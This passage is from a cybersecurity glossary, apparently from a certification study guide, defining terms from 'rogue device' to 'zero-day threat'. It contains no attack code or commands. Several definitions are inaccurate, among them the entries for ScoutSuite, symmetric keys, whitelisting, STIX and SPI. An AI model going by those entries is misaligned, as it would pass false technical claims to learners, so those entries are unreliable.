rogue device Device present in the environment that you do not control.

role-based access control (RBAC) An authentication system in which users are organized by job role into security groups, which are then granted the rights and permissions required to perform that job.

rooting or jailbreaking Attaining root privileges on a smartphone.

rootkit A set of tools that a hacker can use on a computer after she has managed to gain access and elevate her privileges to administrator.

Roots of Trust (RoTs) The foundation of assurance of the trustworthiness of a mobile device.

Ruby A scripting language that is great for web development.

runtime data integrity check The process that ensures the integrity of the peripheral memory contents during runtime execution.

runtime debugging The process of using a programming tool to not only identify syntactic problems in code but also discover weaknesses that can lead to memory leaks and buffer overflows.

S

SABSA An enterprise security architecture framework that uses the six communication questions (What, Where, When, Why, Who, and How) that intersect with six layers (operational, component, physical, logical, conceptual, and contextual).

sanitization The process of removing all traces of a threat by overwriting the drive multiple times.

Sarbanes-Oxley Act (SOX) Also known as the Public Company Accounting Reform and Investor Protection Act of 2002, affects any organization that is publicly traded in the United States. It controls the accounting methods and financial reporting for the organizations and stipulates penalties and even jail time for executive officers.

scope The areas to be included in a scan; determines the impact and is a function of how widespread the incident is.

ScoutSuite A data collection tool that allows you to use what are called longitudinal survey panels to track and monitor the cloud environment.

screened host firewall A firewall that is between the final router and the internal network.

screened subnet Architecture where two firewalls are used, and traffic must be inspected at both firewalls before it can enter the internal network.

scripting Using scripting languages to automate a process.

Secure Boot Requires that all boot loader components (e.g., OS kernel, drivers) attest to their identity (digital signature) and the attestation is compared to the trusted list.

secure enclave A part of an operating system that cannot be compromised even when the operating system kernel is compromised, because the enclave has its own CPU and is separated from the rest of the system.

Secure European System for Applications in a Multi-vendor Environment (SESAME) A project that extended Kerberos’s functionality to fix Kerberos’s weaknesses. Uses both symmetric and asymmetric cryptography to protect interchanged data and uses a trusted authentication server at each host.

secure processing A concept that uses a variety of technologies to prevent the processing of sensitive information or alternately to prevent any insecure actions on the part of the CPU or processor.

Secure Shell (SSH) An application protocol that is used to remotely log in to another computer using a secure tunnel.

secured memory Part of a partition designated as a security sensitive.

Security Assertions Markup Language (SAML) A security attestation model built on XML and SOAP-based services that allows for the exchange of authentication and authorization data between systems and supports federated identity management.

Security Content Automation Protocol (SCAP) A standard that the security automation community uses to enumerate software flaws and configuration issues.

security engineering The process of architecting security features into the design of a system or set of systems.

security information and event management (SIEM) A type of system that provides an automated solution for analyzing security events and data and deciding where the attention needs to be given.

security regression testing A subset of regression testing that validates that changes have not reduced the security of the application or opened new weaknesses.

segmentation Involves limiting the scope of an incident by leveraging existing segments of the network as barriers to prevent the spread to other segments.

Sender Policy Framework (SPF) An e-mail validation system that works by using DNS to determine whether an e-mail sent by someone has been sent by a host sanctioned by that domain’s administrator.

sensitive personal information (SPI) Refers to information that does not identify an individual, but is related to an individual and communicates information that is private or could potentially harm an individual should it be made public.

sensitivity A measure of how freely data can be handled.

service-level agreement (SLA) A document that specifies a service to be provided by a party, the costs of the service, and the expectations of performance.

Service Provisioning Markup Language (SPML) An XML-based framework developed by the Organization for the Advancement of Structured Information Standards (OASIS).

service-oriented architecture (SOA) An architecture that operates on the theory of providing web-based communication functionality without each application requiring redundant code to be written per application.

session hijacking An attack that attempts to place the hacker in the middle of an active conversation between two computers for the purpose of taking over the session of one of the two systems, thus receiving all data sent to that system.

Shibboleth An open source project that provides single sign-on (SSO) capabilities and allows sites to make informed authorization decisions for individual access of protected online resources in a privacy-preserving manner.

Simple Certificate Enrollment Protocol (SCEP) Protocol for provisioning certificates to network devices, including mobile devices.

Simple Object Access Protocol (SOAP) Protocol specification for exchanging structured information in the implementation of web services in computer networks.

single loss expectancy (SLE) The monetary impact of each threat occurrence. Calculated as the asset value (AV) times the exposure factor (EF).

single sign-on (SSO) An environment in which a user enters his login credentials once and can access all resources in the network.

sinkhole A router designed to accept and analyze attack traffic that can be used to draw traffic away from a target, to monitor worm traffic, or to monitor other malicious traffic.

site accreditation Evaluates the application or system at a specific self-contained location.

SOC 1, Type 1 report Service Organization Control reports that focus on the auditors’ opinion of the accuracy and completeness of the data center management’s design of controls.

SOC 1, Type 2 report Service Organization Control reports that include Type 1 and an audit on the effectiveness of controls.

Software as a Service (SaaS) A cloud service model in which the vendor provides the entire solution, including the operating system, the infrastructure software, and the application.

software defined networking (SDN) The decoupling of the control plane and data plane in networking by locating the logic of routers and switches into a central controller and locating simple data forwarding in the physical devices.

software development life cycle (SDLC) Provides a predictable framework of procedures designed to identify all requirements with regard to functionality, cost, reliability, and delivery schedule and ensure that each is met in the final solution.

spyware/adware Tracks your Internet usage in an attempt to tailor ads and junk e-mail to your interests.

SSL/TLS Secure Sockets Layer/Transport Layer Security encryption option for creating VPNs. It works at the application layer of the OSI model. It is used mainly to protect HTTP traffic or web servers.

standard word password A type of password that consists of single words that often include a mixture of upper- and lowercase letters.

static analysis Software analysis that is conducted without the software running.

static code analysis Code analysis that is conducted without the code executing.

static password A type of password that provides a minimum level of security because the password never changes.

Sticky MAC A feature that allows a switch to learn the MAC addresses of the devices currently connected to the port and convert them to secure MAC addresses (the only MAC addresses allowed to send on the port).

strcpy A function in C++ that copies the C string pointed to by the source into the array pointed to by the destination, including the terminating null character (and stopping at that point). A function that has a reputation for issues. The issue is that if the destination is not long enough to contain the string, an overrun occurs.

stream-based cipher A type of cipher that performs encryption on a bit-by-bit basis and uses keystream generators.

stress testing A type of testing that determines the workload that an application can withstand.

string search A search technique that is used to look within a log file or data stream and locate any instances of that string.

Structured Query Language (SQL) injection An attack that inserts, or “injects,” a SQL query as the input data from the client to the application.

Structured Threat Information eXpression (STIX) An XML-based programming language that can be used to communicate cybersecurity data among those using the language.

supervisory control and data acquisition (SCADA) A system operating with coded signals over communication channels so as to provide control of remote equipment.

supplicant In 802.1X, the user or device requesting access to the network.

symmetric algorithm A type of algorithm that uses a private or secret key that must remain secret between the two parties. Each party requires a separate private key.

SYN flood An attack where the target is overwhelmed with unanswered SYN/ACK packets.

synthetic transaction monitoring A type of proactive monitoring that uses external agents to run scripted transactions against an application.

Sysinternals A Windows command-line tool that contains more than 70 tools that can be used for both troubleshooting and security issues.

Syslog A protocol that can be used to collect logs from devices and store them in a central location called a Syslog server.

system accreditation Evaluates an application or support system.

system assessment A process whereby systems are fully vetted for potential issues from both a functionality and security standpoint.

system hardening A process that ensures that all systems have been hardened to the extent that is possible and still provide functionality.

system isolation Isolating systems through the control of communications with the device.

System-on-Chip (SoC) An integrated circuit (also known as a “chip”) that integrates all components of a computer or other electronic system.

T

tabletop exercise An informal brainstorming session that encourages participation from business leaders and other key employees.

tcpdump A command-line tool that can capture packets on Linux and Unix platforms.

technical, control A type of control, usually a software or hardware component, that is used to restrict access.

telemetry system An industrial control system (ICS) component that connects RTUs and PLCs to control centers and the enterprise.

The Open Group Architecture Framework (TOGAF) An enterprise architecture framework that helps organizations design, plan, implement, and govern an enterprise information architecture.

threat actor An attacker who takes advantage of a security loophole.

threat feed A constantly updating stream of indicators or artifacts derived from a source outside the organization.

threat intelligence The process of gathering threat information.

threat model A conceptual design that attempts to provide a framework on which to implement security efforts.

threat modeling methodology A formal process that enables organizations to identify threats and potential attacks and implement the appropriate mitigations against these threats and attacks.

timeliness A description of how recent the data is.

time-of-check/time-of-use An attack that attempts to take advantage of the sequence of events that occurs as the system completes common tasks.

tokenization A form of data hiding or masking in that it replaces a value with a token that is used instead of the actual value.

total attack surface Comprises all of the points at which vulnerabilities exist. It is critical that the organization have a clear understanding of the total attack surface.

trade secret Intellectual property protection that ensures that proprietary technical or business information remains confidential. A trade secret gives an organization a competitive edge. Trade secrets include recipes, formulas, ingredient listings, and so on.

trademark Intellectual property protection that ensures that a symbol, a sound, or an expression that identifies a product or an organization is protected from being used by another organization.

traditional botnet A type of botnet in which all the zombies communicate directly with the command and control server, which is located outside the network.

trend analysis Analysis that focuses on the long-term direction in the increase or decrease in a particular type of traffic or in a particular behavior in the network.

Trojan horse A program or rogue application that appears to or is purported to do one thing but actually does another when executed.

true negative Occurs when a scanner correctly determines that a vulnerability does not exist.

true positive Occurs when a scanner correctly identifies a vulnerability.

Trusted Automated eXchange of Indicator Information (TAXII) An application protocol for exchanging cyber threat information (CTI) over HTTPS.

trusted execution A collection of features that are used to verify the integrity of the system and implement security policies, which together can be used to enhance the trust level of the complete system.

Trusted Foundry program A program that can help you exercise care in ensuring the authenticity and integrity of the components of hardware purchased from a vendor.

Trusted Platform Module (TPM) A security chip installed on a computer’s motherboard that is responsible for protecting symmetric and asymmetric keys, hashes, and digital certificates.

Type 1 hypervisor Virtualization software that is installed on hardware directly, which is why it is commonly called a bare metal hypervisor. A guest operating system runs on another level above the hypervisor. Examples include Citrix XenServer, Microsoft Hyper-V, and VMware vSphere.

Type 2 hypervisor A hypervisor installed over an existing operating system. Examples include VMware Workstation and Oracle VM VirtualBox.

type accreditation Evaluates an application or system that is distributed to a number of different locations.

U

U.S. Digital Millennium Copyright Act Imposes criminal penalties on those who make available technologies whose primary purpose is to circumvent content protection technologies.

uncredentialed scan A scan in which the scanner lacks administrative privileges on the device it is scanning.

Unified Extensible Firmware Interface (UEFI) An open standard interface layer between the firmware and the operating system that requires firmware updates to be digitally signed.

United States Federal Sentencing Guidelines of 1991 Provides guidelines to prevent sentencing disparities that existed across the United States.

unknown threats Threats of which we are not aware.

USA PATRIOT Act Affects law enforcement and intelligence agencies in the United States. Its purpose is to enhance the investigatory tools that law enforcement can use, including e-mail communications, telephone records, Internet communications, medical records, and financial records.

USB on the GO (USB OTG) A specification first used in late 2001 that allows USB devices, such as tablets or smartphones, to act as either a USB host or a USB device.

user acceptance testing Testing designed to ensure that security features do not make an application unusable from the user perspective.

user and entity behavior analytics (UEBA) A type of cybersecurity analysis that focuses on normal user activities and detects anomalous behavior when there are deviations from the norm.

Usermode debugger A debugger that has access to only the usermode space of the operating system.

V

Victim Corner of the Diamond model that describes a single victim or multiple victims.

virtual desktop infrastructure (VDI) An infrastructures that hosts desktop operating systems within a virtual environment in a centralized server.

virtual local-area network (VLAN) A logical subdivision of a switch that segregates ports from one another as if they were in different LANs.

virtual private cloud (VPC) A cloud model in which a public cloud provider isolates a specific portion of its public cloud infrastructure to be provisioned for private use.

virtual private network (VPN) A connection that allows external devices to access an internal network by creating an encrypted tunnel over the Internet.

virtual SAN A software-defined networking storage method that allows pooling of storage capabilities and instant and automatic provisioning of virtual machine storage.

virtual TPM A software object that performs the functions of a TPM chip.

virus A self-replicating program that infects software.

VM escape An attack that occurs when a guest OS escapes from its VM encapsulation to interact directly with the hypervisor.

vulnerability feed An RSS feed dedicated to the sharing of information about the latest vulnerabilities.

vulnerability management The process of identification and mitigation of vulnerabilities.

vulnerability scan A type of scan that locates vulnerabilities in systems.

W

web application firewall (WAF) A firewall that applies rule sets to an HTTP conversation. These rule sets cover common attack types to which these session types are susceptible. Among the common attacks they address are cross-site scripting and SQL injections.

web vulnerability scanner A type of scanner used to assess the security of web applications.

white team A group of technicians that referees the encounter between the red team and the blue team during testing.

whitelisting The process of identifying and blocking as good senders a list of acceptable e-mail addresses, Internet addresses, websites, applications, or some other identifier.

wireless intrusion prevention system (WIPS) A system that not only can alert you when any unknown device is in the area (APs and stations) but can take a number of actions.

wireless key logger Collects information and transmits it to the criminal via Bluetooth or Wi-Fi.

Wireshark One of the most widely used network packet sniffers.

work product retention Work done for and owned by the organization.

work recovery time (WRT) The difference between the recovery time objective (RTO) and the maximum tolerable downtime (MTD), which is the remaining time that is left over after the RTO before reaching the MTD.

workflow orchestration Sequencing of events based on certain parameters by using scripting and scripting tools.

worm A type of malware that can spread without the assistance of the user.

X–Z

XMAS scan A type of scan that sets the FIN, PSH, and URG flags.

ZAP An interception proxy produced by the Open Web Application Security Project (OWASP).

zero-day threat A threat that has no known solution yet.